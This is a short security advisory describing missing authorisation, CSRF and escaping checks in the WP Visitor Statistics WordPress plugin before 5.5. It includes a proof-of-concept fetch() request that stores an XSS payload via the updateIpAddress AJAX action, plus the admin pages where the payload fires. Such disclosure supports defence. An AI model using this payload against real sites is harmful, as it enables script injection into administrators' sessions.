WP Visitor Statistics (Real Time Traffic) < 5.5 - Arbitrary IP Address Exclusion to Stored XSS

The plugin does not have authorisation and CSRF checks in the updateIpAddress AJAX action, allowing any authenticated user to call it, or make a logged in user do it via a CSRF attack and add an arbitrary IP address to exclude. Furthermore, due to the lack of validation, sanitisation and escaping, users could set a malicious value and perform Cross-Site Scripting attacks against logged in admin

PoC

As any logged-in user: fetch(“http://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“updateIpAddress”,“ip”:‘" style=animation-name:rotation onanimationstart=alert(1) x’}), “method”: “POST”, “credentials”: “include” }) .then(response => response.text()) .then(data => console.log(data)); Then (as admin) browse to https://example.com/wp-admin/admin.php?page=wsm_settings#ipexclusion or https://example.com/wp-admin/admin.php?page=wsm_ipexc